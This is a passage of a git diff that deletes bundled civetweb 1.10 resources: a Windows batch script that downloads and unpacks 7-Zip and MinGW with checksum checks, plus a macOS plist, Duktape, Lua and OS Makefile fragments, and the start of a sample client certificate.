-@if not errorlevel 1 goto :find_sevenzip_done
-@set checksum=2FAC454A90AE96021F4FFC607D4C00F8
-@set "url=http://7-zip.org/a/7za920.zip"
-@for /f %%a in ("%url: =-%") do @set "file_name=%%~na"
-@for /f %%a in ("%url: =-%") do @set "file_ext=%%~xa"
-@set "archive_path=%dependency_path%\%file_name%%file_ext%"
-@if not exist "%archive_path%" (
-  @call :log 6
-  @call :log 1 "Downloading 7zip archive"
-  @call :download "%url%" "%archive_path%" %checksum%
-  @if errorlevel 1 (
-    @del "%archive_path%" 2>nul
-    @call :log 0 "Failed to download: %file_name%%file_ext%"
-    @exit /b 1
-  )
-)
-@set "sevenzip_path=%dependency_path%\sevenzip"
-@if not exist "%sevenzip_path%" (
-  @call :unzip "%archive_path%" "%sevenzip_path%"
-  @if errorlevel 1 (
-    @call :log 0 "Failed to unzip the7zip archive"
-    @exit /b 1
-  )
-)
-@set "sevenzip_executable=%sevenzip_path%\7za.exe"
-@if not exist "%sevenzip_executable%" (
-  @call :log 0 "Failed to find unpacked 7zip: %sevenzip_executable%"
-  @exit /b 1
-)
-:find_sevenzip_done
-@call :log 2 "Found 7zip: %sevenzip_executable%"
-@endlocal & set "%var%=%sevenzip_executable%"
-@goto :eof
-
-:unzip - Unzips a .zip archive
-:: %1 - The archive to unzip
-:: %2 - The location to unzip to
-@setlocal
-@set "archive_path=%~1"
-@if "%archive_path%" == "" @exit /b 1
-@set "folder_path=%~2"
-@if "%folder_path%" == "" @exit /b 1
-@for /f %%a in ("%archive_path: =-%") do @set "file_name=%%~na"
-@for /f %%a in ("%archive_path: =-%") do @set "file_ext=%%~xa"
-@call :log 2 "Unzipping: %file_name%%file_ext%"
-@call :iso8601 iso8601
-@set "log_path=%temp%\unzip-%iso8601%-%file_name%.log"
-@powershell ^
-  Add-Type -assembly "system.io.compression.filesystem"; ^
-  [io.compression.zipfile]::ExtractToDirectory(^
-    '%archive_path%', '%folder_path%') 2>"%log_path%"
-@if errorlevel 1 (
-  @call :log 0 "Failed to unzip: %file_name%%file_ext%"
-  @call :log_append "%log_path%"
-  @exit /b 1
-)
-@endlocal
-@goto :eof
-
-:resolve_version - Gets the version of the MinGW compiler
-:: %1 - The return variable for the version
-:: %2 - The repository information to use
-:: %3 - The architecture of the compiler
-:: %4 - Version of MinGW to get [optional]
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "repository=%~2"
-@if "%repository%" == "" @exit /b 1
-@set "arch=%~3"
-@if "%arch%" == "" @exit /b 1
-@set "version=%~4"
-@if not "%version%" == "" goto :resolve_version_done
-:: Find the latest version
-@call :log 3 "Finding latest version"
-@set version=0.0.0
-@for /f "delims=| tokens=1-6" %%a in (%repository%) do @(
-  @if "%arch%" == "%%a" (
-    @call :version_compare result "%version%" "%%b"
-    @if errorlevel 1 (
-      @call :log 0 "Failed to compare versions: %version% %%a"
-      @exit /b 1
-    )
-    @if !result! lss 0 set version=%%b
-  )
-)
-:resolve_version_done
-@if "%version%" == "" (
-  @call :log 0 "Failed to resolve latest version number"
-  @exit /b 1
-)
-@call :log 2 "Resolved version: %version%"
-@endlocal & set "%var%=%version%"
-@goto :eof
-
-:resolve_threading - Gets the threading model of the MinGW compiler
-:: %1 - The return variable for the threading model
-:: %2 - The repository information to use
-:: %3 - The architecture of the compiler
-:: %4 - The version of the compiler
-:: %5 - threading model of MinGW to use [optional]
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "repository=%~2"
-@if "%repository%" == "" @exit /b 1
-@set "arch=%~3"
-@if "%arch%" == "" @exit /b 1
-@set "version=%~4"
-@if "%version%" == "" @exit /b 1
-@set "threading=%~5"
-@if not "%threading%" == "" goto :resolve_threading_done
-@call :log 3 "Finding best threading model"
-@for /f "delims=| tokens=1-6" %%a in (%repository%) do @(
-  @if "%arch%" == "%%a" (
-    @if "%version%" == "%%b" (
-      @if not defined threading (
-        @set "threading=%%c"
-      )
-      @if "%%c" == "posix" (
-        @set "threading=%%c"
-) ) ) )
-:resolve_threading_done
-@if "%threading%" == "" (
-  @call :log 0 "Failed to resolve the best threading model"
-  @exit /b 1
-)
-@call :log 2 "Resolved threading model: %threading%"
-@endlocal & set "%var%=%threading%"
-@goto :eof
-
-:resolve_exceptions - Gets the exception model of the MinGW compiler
-:: %1 - The return variable for the exception model
-:: %2 - The repository information to use
-:: %3 - The architecture of the compiler
-:: %4 - The version of the compiler
-:: %4 - The threading model of the compiler
-:: %5 - exception model of MinGW to use [optional]
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "repository=%~2"
-@if "%repository%" == "" @exit /b 1
-@set "arch=%~3"
-@if "%arch%" == "" @exit /b 1
-@set "version=%~4"
-@if "%version%" == "" @exit /b 1
-@set "threading=%~5"
-@if "%threading%" == "" @exit /b 1
-@set "exceptions=%~6"
-@if not "%exceptions%" == "" goto :resolve_exceptions_done
-@call :log 3 "Finding best exception model"
-@for /f "delims=| tokens=1-6" %%a in (%repository%) do @(
-  @if "%arch%" == "%%a" (
-    @if "%version%" == "%%b" (
-      @if "%threading%" == "%%c" (
-        @if not defined exceptions (
-          @set "exceptions=%%d"
-        )
-        @if "%%d" == "dwarf" (
-          @set "exceptions=%%d"
-        )
-        @if "%%d" == "seh" (
-          @set "exceptions=%%d"
-) ) ) ) )
-:resolve_exceptions_done
-@if "%exceptions%" == "" (
-  @call :log 0 "Failed to resolve the best exception model"
-  @exit /b 1
-)
-@call :log 2 "Resolved exception model: %exceptions%"
-@endlocal & set "%var%=%exceptions%"
-@goto :eof
-
-:resolve_revision - Gets the revision of the MinGW compiler
-:: %1 - The return variable for the revision
-:: %2 - The repository information to use
-:: %3 - The architecture of the compiler
-:: %4 - The version of the compiler
-:: %4 - The threading model of the compiler
-:: %4 - The exception model of the compiler
-:: %5 - revision of the MinGW package to use [optional]
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "repository=%~2"
-@if "%repository%" == "" @exit /b 1
-@set "arch=%~3"
-@if "%arch%" == "" @exit /b 1
-@set "version=%~4"
-@if "%version%" == "" @exit /b 1
-@set "threading=%~5"
-@if "%threading%" == "" @exit /b 1
-@set "exceptions=%~6"
-@if "%exceptions%" == "" @exit /b 1
-@set "revision=%~7"
-@if not "%revision%" == "" goto :resolve_revision_done
-@call :log 3 "Finding latest revision"
-@for /f "delims=| tokens=1-6" %%a in (%repository%) do @(
-  @if "%arch%" == "%%a" (
-    @if "%version%" == "%%b" (
-      @if "%threading%" == "%%c" (
-        @if "%exceptions%" == "%%d" (
-          @if "%%e" gtr "%revision%" (
-            @set "revision=%%e"
-) ) ) ) ) )
-:resolve_revision_done
-@if "%revision%" == "" (
-  @call :log 0 "Failed to resolve latest revision"
-  @exit /b 1
-)
-@call :log 2 "Resolved revision: %revision%"
-@endlocal & set "%var%=%revision%"
-@goto :eof
-
-:version_compare - Compares two semantic version numbers
-:: %1 - The return variable:
-::        - < 0 : if %2 < %3
-::        -   0 : if %2 == %3
-::        - > 0 : if %2 > %3
-:: %2 - The first version to compare
-:: %3 - The second version to compare
-@setlocal
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "lhs=%~2"
-@if "%lhs%" == "" @exit /b 1
-@set "rhs=%~3"
-@if "%lhs%" == "" @exit /b 1
-@set result=0
-@for /f "delims=. tokens=1-6" %%a in ("%lhs%.%rhs%") do @(
-  @if %%a lss %%d (
-    set result=-1
-    goto :version_compare_done
-  ) else (
-    @if %%a gtr %%d (
-      set result=1
-      goto :version_compare_done
-    ) else (
-      @if %%b lss %%e (
-        set result=-1
-        goto :version_compare_done
-      ) else (
-        @if %%b gtr %%e (
-          set result=1
-          goto :version_compare_done
-        ) else (
-          @if %%c lss %%f (
-            set result=-1
-            goto :version_compare_done
-          ) else (
-            @if %%c gtr %%f (
-              set result=1
-              goto :version_compare_done
-            )
-          )
-        )
-      )
-    )
-  )
-)
-:version_compare_done
-@endlocal & set "%var%=%result%"
-@goto :eof
-
-:print_usage - Prints the usage of the script
-:: %* - message to print, each argument on it's own line
-@setlocal
-@for %%a in (%*) do @echo.%%~a
-@echo.
-@echo.build [/?][/v[v...]^|/q][/version][/arch a][/threading t]
-@echo.      [/exceptions e][/revision r] location
-@echo.
-@echo.  /version v  The version of MinGW to download
-@echo.  /arch a     The target architecture [i686^|x86_64]
-@echo.  /threading t
-@echo.              Threading model to use [posix^|win32]
-@echo.  /exceptions e
-@echo.              Exception model to use [sjlj^|seh^|dwarf]
-@echo.  /revision e Revision of the release to use
-@echo.  /v          Sets the output to be more verbose
-@echo.  /v[v...]    Extra verbosity, /vv, /vvv, etc
-@echo.  /q          Quiets the output
-@echo.  /?          Shows this usage message
-@echo.
-@endlocal
-@goto :eof
-
-:script_source - Determines if the script was ran from the cli or explorer
-:: %1 - The return variable [cli|explorer]
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@call :log 3 "Attempting to detect the script source"
-@echo "The invocation command was: '%cmdcmdline%'" >> %log_path%
-@for /f "tokens=1-3,*" %%a in ("%cmdcmdline%") do @(
-  set cmd=%%~a
-  set arg1=%%~b
-  set arg2=%%~c
-  set rest=%%~d
-)
-@set quote="
-@if "!arg2:~0,1!" equ "!quote!" (
-  if "!arg2:~-1!" neq "!quote!" (
-    set "arg2=!arg2:~1!"
-  )
-)
-@call :log 4 "cmd  = %cmd%"
-@call :log 4 "arg1 = %arg1%"
-@call :log 4 "arg2 = %arg2%"
-@call :log 4 "rest = %rest%"
-@call :log 4 "src  = %~f0"
-@if /i "%arg2%" == "call" (
-  set script_source=cli
-) else (
-  @if /i "%arg1%" == "/c" (
-    set script_source=explorer
-  ) else (
-    set script_source=cli
-  )
-)
-@call :log 3 "The script was invoked from %script_source%"
-@endlocal & set "%~1=%script_source%"
-@goto :eof
-
-:architecture - Finds the system architecture
-:: %1 - The return variable [i686|x86_64]
-@setlocal
-@call :log 3 "Determining the processor architecture"
-@set "key=HKLM\System\CurrentControlSet\Control\Session Manager\Environment"
-@set "var=PROCESSOR_ARCHITECTURE"
-@for /f "skip=2 tokens=2,*" %%a in ('reg query "%key%" /v "%var%"') do @set "arch=%%b"
-@if "%arch%" == "AMD64" set arch=x86_64
-@if "%arch%" == "x64" set arch=i686
-@call :log 4 "arch = %arch%"
-@endlocal & set "%~1=%arch%"
-@goto :eof
-
-:md5 - Gets the MD5 checksum for a file
-:: %1 - The hash
-:: %2 - The file path
-@setlocal
-@set "var=%~1"
-@set "file_path=%~2"
-@if "%var%" == "" @exit /b 1
-@if "%file_path%" == "" @exit /b 1
-@if not exist "%file_path%" @exit /b 1
-@for /f "skip=3 tokens=1,*" %%a in ('powershell Get-FileHash -Algorithm MD5 "'%file_path%'"') do @set hash=%%b
-@if not defined hash (
-  @call :log 6
-  @call :log 0 "Failed to get MD5 hash for %file_path%"
-  @exit /b 1
-)
-@endlocal & set "%var%=%hash: =%"
-@goto :eof
-
-:windows_version - Checks the windows version
-:: %1 - The windows version
-:: %2 - The major version number return variable
-:: %3 - The minor version number return variable
-:: %4 - The revision version number return variable
-@setlocal
-@call :log 3 "Retrieving the Windows version"
-@for /f "tokens=2 delims=[]" %%x in ('ver') do @set win_ver=%%x
-@set win_ver=%win_ver:Version =%
-@set win_ver_major=%win_ver:~0,1%
-@set win_ver_minor=%win_ver:~2,1%
-@set win_ver_rev=%win_ver:~4%
-@call :log 4 "win_ver = %win_ver%"
-@endlocal & set "%~1=%win_ver%" ^
-          & set "%~2=%win_ver_major%" ^
-          & set "%~3=%win_ver_minor%" ^
-          & set "%~4=%win_ver_rev%"
-@goto :eof
-
-:find_in_path - Finds a program of file in the PATH
-:: %1 - return variable of the file path
-@setlocal
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "file=%~2"
-@if "%file%" == "" @exit /b 1
-@call :log 3 "Searching PATH for %file%"
-@for %%x in ("%file%") do @set "file_path=%%~f$PATH:x"
-@if not defined file_path @exit /b 1
-@endlocal & set "%var%=%file_path%"
-@goto :eof
-
-:log_append - Appends another file into the current logging file
-:: %1 - the file_path to the file to concatenate
-@setlocal
-@set "file_path=%~1"
-@if "%file_path%" == "" @exit /b 1
-@call :log 3 "Appending to log: %file_path%"
-@call :iso8601 iso8601
-@set temp_log=%temp%\append-%iso8601%.log
-@call :log 4 "Using temp file %temp_log%"
-@type "%log_path%" "%file_path%" > "%temp_log%" 2>nul
-@move /y "%temp_log%" "%log_path%" 1>nul
-@del "%file_path% 2>nul
-@del "%temp_log% 2>nul
-@endlocal
-@goto :eof
-
-:iso8601 - Returns the current time in ISO8601 format
-:: %1 - the return variable
-:: %2 - format [extended|basic*]
-:: iso8601 - contains the resulting timestamp
-@setlocal
-@wmic Alias /? >NUL 2>&1 || @exit /b 1
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "format=%~2"
-@if "%format%" == "" set format=basic
-@for /F "skip=1 tokens=1-6" %%g IN ('wmic Path Win32_UTCTime Get Day^,Hour^,Minute^,Month^,Second^,Year /Format:table') do @(
-  @if "%%~l"=="" goto :iso8601_done
-  @set "yyyy=%%l"
-  @set "mm=00%%j"
-  @set "dd=00%%g"
-  @set "hour=00%%h"
-  @set "minute=00%%i"
-  @set "seconds=00%%k"
-)
-:iso8601_done
-@set mm=%mm:~-2%
-@set dd=%dd:~-2%
-@set hour=%hour:~-2%
-@set minute=%minute:~-2%
-@set seconds=%seconds:~-2%
-@if /i [%format%] == [extended] (
-  set iso8601=%yyyy%-%mm%-%dd%T%hour%:%minute%:%seconds%Z
-) else (
-  if /i [%format%] == [basic] (
-    set iso8601=%yyyy%%mm%%dd%T%hour%%minute%%seconds%Z
-  ) else (
-    @exit /b 1
-  )
-)
-@set iso8601=%iso8601: =0%
-@endlocal & set %var%=%iso8601%
-@goto :eof
-
-:verbosity - Processes the verbosity parameter '/v[v...]
-:: %1 - verbosity given on the command line
-:: logging_level - set to the number of v's
-@setlocal
-@set logging_level=0
-@set verbosity=%~1
-:verbosity_loop
-@set verbosity=%verbosity:~1%
-@if not [%verbosity%] == [] @(
-  set /a "logging_level=logging_level+1"
-  goto verbosity_loop
-)
-@endlocal & set logging_level=%logging_level%
-@goto :eof
-
-:log - Logs a message, depending on verbosity
-:: %1 - level
-::       [0-4] for CLI logging
-::       [5-9] for GUI logging
-:: %2 - message to print
-@setlocal
-@set "level=%~1"
-@set "msg=%~2"
-@if "%log_folder%" == "" (
-  echo Logging was used to early in the script, log_folder isn't set yet
-  goto :eof
-)
-@if "%log_path%" == "" (
-  echo Logging was used to early in the script, log_path isn't set yet
-  goto :eof
-)
-@if not exist "%log_folder%" mkdir "%log_folder%"
-@if not exist "%log_path%" echo. 1>nul 2>"%log_path%"
-@echo.%msg% >> "%log_path%"
-@if %level% geq 5 (
-  @if [%script_source%] == [explorer] (
-    set /a "level=level-5"
-  ) else (
-    @goto :eof
-  )
-)
-@if "%logging_level%" == "" (
-  echo Logging was used to early in the script, logging_level isn't set yet
-  goto :eof
-)
-@if %logging_level% geq %level% echo.%msg% 1>&2
-@endlocal
-@goto :eof
-
-:download - Downloads a file from the internet
-:: %1 - the url of the file to download
-:: %2 - the file to download to
-:: %3 - the MD5 checksum of the file (optional)
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :print_usage "Failed to enable extensions"
-  @exit /b 1
-)
-@set "url=%~1"
-@set "file_path=%~2"
-@set "checksum=%~3"
-@for %%a in (%file_path%) do @set dir_path=%%~dpa
-@for %%a in (%file_path%) do @set file_name=%%~nxa
-@if "%url%" == "" @exit /b 1
-@if "%file_path%" == "" @exit /b 1
-@if "%dir_path%" == "" @exit /b 1
-@if "%file_name%" == "" @exit /b 1
-@if not exist "%dir_path%" mkdir "%dir_path%"
-@call :log 2 "Downloading %url%"
-@call :iso8601 iso8601
-@set "temp_path=%temp%\download-%iso8601%-%file_name%"
-@set "log_path=%temp%\download-%iso8601%-log-%file_name%"
-@call :log 4 "Using temp file %temp_path%"
-@powershell Invoke-WebRequest "'%url%'" ^
-  -OutFile "'%temp_path%'" ^
-  -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::IE ^
-  1>nul 2>"%log_path%"
-@if errorlevel 1 (
-  @call :log 0 "Failed to download %url%"
-  @call :log_append "%log_path%"
-  @exit /b 1
-)
-@if [%checksum%] neq [] (
-  @call :log 4 "Checking %checksum% against %temp_path%"
-  @call :md5 hash "%temp_path%"
-  if "!hash!" neq "%checksum%" (
-    @call :log 0 "Failed to match checksum: %temp_path%"
-    @call :log 0 "Hash    : !hash!"
-    @call :log 0 "Checksum: %checksum%"
-    @exit /b 1
-  ) else (
-    @call :log 3 "Checksum matched: %temp_path%"
-    @call :log 3 "Hash    : !hash!"
-    @call :log 3 "Checksum: %checksum%"
-  )
-)
-@call :log 4 "Renaming %temp_path% to %file_path%"
-@move /y "%temp_path%" "%file_path%" 1>nul
-@endlocal
-@goto :eof
diff --git a/thirdparty/civetweb-1.10/resources/Info.plist b/thirdparty/civetweb-1.10/resources/Info.plist
deleted file mode 100644
index f02e19a..0000000
--- a/thirdparty/civetweb-1.10/resources/Info.plist
+++ /dev/null
@@ -1,21 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-  <key>CFBundleExecutable</key> <string>Civetweb</string>
-  <key>CFBundlePackageType</key> <string>APPL</string>
-  <key>CFBundleTypeRole</key> <string>None</string>
-  <key>CFBundleIconFile</key> <string>civetweb</string>
-  <key>CFBundleIconFiles</key> <array>
-    <string>civetweb_16x16.png</string>
-    <string>civetweb_22x22.png</string>
-    <string>civetweb_32x32.png</string>
-    <string>civetweb_64x64.png</string>
-  </array>
-  <key>LSUIElement</key> <true/>
-  <key>RunAtLoad</key> <true/>
-  <key>Label</key> <string>com.nofacepress.civetweb</string>
-  <key>ProgramArguments</key> <array> </array>
-  <key>KeepAlive</key> <true/>
-</dict>
-</plist>
diff --git a/thirdparty/civetweb-1.10/resources/Makefile.in-duktape b/thirdparty/civetweb-1.10/resources/Makefile.in-duktape
deleted file mode 100644
index 3a53f2e..0000000
--- a/thirdparty/civetweb-1.10/resources/Makefile.in-duktape
+++ /dev/null
@@ -1,77 +0,0 @@
-#
-# Copyright (c) 2015-2017 the Civetweb developers
-#
-# License http://opensource.org/licenses/mit-license.php MIT License
-#
-
-ifndef WITH_DUKTAPE
-  $(error WITH_DUKTAPE is not defined)
-endif
-
-# Duktape default version is 1.5.2 (105)
-WITH_DUKTAPE_VERSION ?= 105
-DUKTAPE_VERSION_KNOWN = 0
-
-# Select src and header according to the Duktape version
-ifeq ($(WITH_DUKTAPE_VERSION), 105)
-  $(info Duktape: Using version 1.5.2)
-  DUKTAPE_DIR = src/third_party/duktape-1.5.2/src
-  DUKTAPE_SHARED_LIB_FLAG = -lduktape1.5
-  DUKTAPE_CFLAGS = -DDUKTAPE_VERSION_MAKEFILE=105
-  DUKTAPE_VERSION_KNOWN = 1
-endif
-
-ifeq ($(WITH_DUKTAPE_VERSION), 108)
-  $(info Duktape: Using version 1.8.0)
-  DUKTAPE_DIR = src/third_party/duktape-1.8.0/src
-  DUKTAPE_SHARED_LIB_FLAG = -lduktape1.8
-  DUKTAPE_CFLAGS = -DDUKTAPE_VERSION_MAKEFILE=108
-  DUKTAPE_VERSION_KNOWN = 1
-endif
-
-ifeq ($(WITH_DUKTAPE_VERSION), 201)
-  $(info Duktape: Using version 2.1.1)
-  DUKTAPE_DIR = src/third_party/duktape-2.1.1/src
-  DUKTAPE_SHARED_LIB_FLAG = -lduktape2.1
-  DUKTAPE_CFLAGS = -DDUKTAPE_VERSION_MAKEFILE=201
-  DUKTAPE_VERSION_KNOWN = 1
-endif
-
-ifneq ($(DUKTAPE_VERSION_KNOWN), 1)
-  $(error Duktape: Unknwon version - $(WITH_DUKTAPE_VERSION))
-endif
-
-
-# Add flags for all Duktape versions
-DUKTAPE_CFLAGS += -I$(DUKTAPE_DIR) -DUSE_DUKTAPE
-
-ifneq ($(TARGET_OS),WIN32)
-#  DUKTAPE_CFLAGS += 
-endif
-
-ifdef WITH_DUKTAPE_SHARED
-
-  DUKTAPE_SOURCE_FILES =
-
-  $(info Duktape: using dynamic linking)
-
-else
-
-  DUKTAPE_SOURCE_FILES = duktape.c
-
-ifeq ($(WITH_DUKTAPE_VERSION), 104)
-#    DUKTAPE_SOURCE_FILES += ... TODO ...
-endif
-
-  $(info Duktape: using static library)
-
-endif
-
-DUKTAPE_SOURCES = $(addprefix $(DUKTAPE_DIR)/, $(DUKTAPE_SOURCE_FILES))
-DUKTAPE_OBJECTS = $(DUKTAPE_SOURCES:.c=.o)
-
-OBJECTS += $(DUKTAPE_OBJECTS)
-CFLAGS += $(DUKTAPE_CFLAGS)
-SOURCE_DIRS = $(DUKTAPE_DIR)
-BUILD_DIRS += $(BUILD_DIR)/$(DUKTAPE_DIR)
-
diff --git a/thirdparty/civetweb-1.10/resources/Makefile.in-lua b/thirdparty/civetweb-1.10/resources/Makefile.in-lua
deleted file mode 100644
index e91d019..0000000
--- a/thirdparty/civetweb-1.10/resources/Makefile.in-lua
+++ /dev/null
@@ -1,149 +0,0 @@
-#
-# Copyright (c) 2013 No Face Press, LLC
-# Copyright (c) 2014-2017 the Civetweb developers
-#
-# License http://opensource.org/licenses/mit-license.php MIT License
-#
-
-ifndef WITH_LUA
-  $(error WITH_LUA is not defined)
-endif
-
-# Lua Default version is 502
-WITH_LUA_VERSION ?= 502
-LUA_VERSION_KNOWN = 0
-
-# Select src and header according to the Lua version
-ifeq ($(WITH_LUA_VERSION), 501)
-  $(info Lua: Using version 5.1.5)
-  LUA_DIR = src/third_party/lua-5.1.5/src
-  LUA_SHARED_LIB_FLAG = -llua5.1
-  LUA_CFLAGS = -DLUA_VERSION_MAKEFILE=501
-  LUA_VERSION_KNOWN = 1
-endif
-ifeq ($(WITH_LUA_VERSION), 502)
-  $(info Lua: Using version 5.2.4)
-  LUA_DIR = src/third_party/lua-5.2.4/src
-  LUA_SHARED_LIB_FLAG = -llua5.2
-  LUA_CFLAGS = -DLUA_VERSION_MAKEFILE=502
-  LUA_VERSION_KNOWN = 1
-endif
-ifeq ($(WITH_LUA_VERSION), 503)
-  $(info Lua: Using version 5.3.3)
-  LUA_DIR = src/third_party/lua-5.3.3/src
-  LUA_SHARED_LIB_FLAG = -llua5.3
-  LUA_CFLAGS = -DLUA_COMPAT_5_2 -DLUA_VERSION_MAKEFILE=503
-  LUA_VERSION_KNOWN = 1
-endif
-
-ifneq ($(LUA_VERSION_KNOWN), 1)
-  $(error Lua: Unknwon version - $(WITH_LUA_VERSION))
-endif
-
-
-# Add flags for all Lua versions
-LUA_CFLAGS += -I$(LUA_DIR) -DLUA_COMPAT_ALL -DUSE_LUA
-
-ifneq ($(TARGET_OS),WIN32)
-  LUA_CFLAGS += -DLUA_USE_POSIX -DLUA_USE_DLOPEN
-endif
-
-ifdef WITH_LUA_SHARED
-
-  LUA_SOURCE_FILES =
-
-  $(info Lua: using dynamic linking)
-
-else
-
-  LUA_SOURCE_FILES = lapi.c  \
-    lauxlib.c \
-    lbaselib.c  \
-    lcode.c  \
-    ldblib.c  \
-    ldebug.c  \
-    ldo.c  \
-    ldump.c \
-    lfunc.c  \
-    lgc.c  \
-    linit.c \
-    liolib.c  \
-    llex.c \
-    lmathlib.c \
-    lmem.c  \
-    loadlib.c  \
-    lobject.c  \
-    lopcodes.c \
-    loslib.c  \
-    lparser.c  \
-    lstate.c  \
-    lstring.c \
-    lstrlib.c  \
-    ltable.c  \
-    ltablib.c \
-    ltm.c  \
-    lundump.c \
-    lvm.c  \
-    lzio.c
-
-ifeq ($(WITH_LUA_VERSION), 502)
-    LUA_SOURCE_FILES += lbitlib.c  \
-    lcorolib.c  \
-    lctype.c
-endif
-ifeq ($(WITH_LUA_VERSION), 503)
-    LUA_SOURCE_FILES += lbitlib.c  \
-    lcorolib.c  \
-    lctype.c  \
-    lutf8lib.c
-endif
-
-  $(info Lua: using static library)
-
-endif
-
-LUA_SOURCES = $(addprefix $(LUA_DIR)/, $(LUA_SOURCE_FILES))
-LUA_OBJECTS = $(LUA_SOURCES:.c=.o)
-
-OBJECTS += $(LUA_OBJECTS)
-CFLAGS += $(LUA_CFLAGS)
-SOURCE_DIRS = $(LUA_DIR)
-BUILD_DIRS += $(BUILD_DIR)/$(LUA_DIR)
-
-
-ifneq ($(WITH_LUA_VERSION), 501)
-  SQLITE_DIR = src/third_party
-  SQLITE_SOURCE_FILES = sqlite3.c lsqlite3.c
-  SQLITE_SOURCES = $(addprefix $(SQLITE_DIR)/, $(SQLITE_SOURCE_FILES))
-  SQLITE_OBJECTS = $(SQLITE_SOURCES:.c=.o)
-  SQLITE_CFLAGS = -I$(SQLITE_DIR) -DTHREADSAFE=1 -DSQLITE_ENABLE_FTS3 -DSQLITE_ENABLE_FTS3_PARENTHESIS
-  OBJECTS += $(SQLITE_OBJECTS)
-  CFLAGS += $(SQLITE_CFLAGS)
-  CFLAGS += -DUSE_LUA_SQLITE3
-  #SOURCE_DIRS = $(SQLITE_DIR)
-endif
-
-
-LFS_DIR = src/third_party
-LFS_SOURCE_FILES = lfs.c
-LFS_SOURCES = $(addprefix $(LFS_DIR)/, $(LFS_SOURCE_FILES))
-LFS_OBJECTS = $(LFS_SOURCES:.c=.o)
-LFS_CFLAGS = -I$(LFS_DIR)
-OBJECTS += $(LFS_OBJECTS)
-CFLAGS += $(LFS_CFLAGS)
-CFLAGS += -DUSE_LUA_FILE_SYSTEM
-#SOURCE_DIRS = $(LFS_DIR)
-
-
-ifneq ($(WITH_LUA_VERSION), 501)
-  LXML_DIR = src/third_party
-  LXML_SOURCE_FILES = LuaXML_lib.c
-  LXML_SOURCES = $(addprefix $(LXML_DIR)/, $(LXML_SOURCE_FILES))
-  LXML_OBJECTS = $(LXML_SOURCES:.c=.o)
-  LXML_CFLAGS = -I$(LXML_DIR)
-  OBJECTS += $(LXML_OBJECTS)
-  CFLAGS += $(LXML_CFLAGS)
-  CFLAGS += -DUSE_LUA_LUAXML
-  #SOURCE_DIRS = $(LXML_DIR)
-endif
-
diff --git a/thirdparty/civetweb-1.10/resources/Makefile.in-os b/thirdparty/civetweb-1.10/resources/Makefile.in-os
deleted file mode 100644
index a759134..0000000
--- a/thirdparty/civetweb-1.10/resources/Makefile.in-os
+++ /dev/null
@@ -1,23 +0,0 @@
-# 
-# Copyright (c) 2013 No Face Press, LLC
-# License http://opensource.org/licenses/mit-license.php MIT License
-#
-
-# Override this using TARGET_OS=LINUX on the command line
-ifeq ($(TARGET_OS),)
-  ifeq ($(OS),Windows_NT)
-    TARGET_OS = WIN32
-  else
-    UNAME_S := $(shell uname -s)
-    ifeq ($(UNAME_S),Linux)
-        TARGET_OS = LINUX
-    else
-        ifeq ($(UNAME_S),Darwin)
-            TARGET_OS = OSX
-        else
-            TARGET_OS = BSD
-        endif
-    endif
-  endif
-endif
-
diff --git a/thirdparty/civetweb-1.10/resources/cert/client.crt b/thirdparty/civetweb-1.10/resources/cert/client.crt
deleted file mode 100644
index f6bbdd8..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/client.crt
+++ /dev/null
@@ -1,19 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDBjCCAe4CCQCFpskbTEyGpTANBgkqhkiG9w0BAQsFADBFMQswCQYDVQQGEwJB
-VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
-cyBQdHkgTHRkMB4XDTE3MDkwMzE5MjIwNVoXDTI3MDkwMTE5MjIwNVowRTELMAkG
-A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
-ANyFUuYxv/uexSr/K9aSmcnEcylNH4S3NdlvMwFvW3XFqAV05tV6HnPnSELEk6t3
-8aMDUGKDBrrjwsVK6+S7OyrkioXeB9dWldHbqD7o3MkIM3sUxUtaR6x0RMZ+sIX4
-XpE0xULcip1bG0etP4Z2frEP2IOOValQcm4SCnKYZJyTr/oR31NmlIPU/47s74U6
-rqwwUE92bzvf1jGeUHEn7IAgSJNIUBNsOIdRQAMBuTJIAmG2qawXaetjLi/NBwNS
-d0OX2v3o9SrA+ZhQYpPG5xp3B3ncHgVvmhmp7hUdlYbiemcUHn18hZjxPVZLbtY8
-gQldrWyMZkVabSZjuIH3IKcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAUZsxxYVK
-l0tH8E0FCnRJTvG6gjOeiqJRIk7Mmg+hfFZK/ewqBixxg1OBM/xmPXfnI/ULRz74
-UMXnyDIsGakzrFDqWqPt3xots35yHHo2ZkVao6gV4qx0Reu86qeN5iRvG0EjoGMD
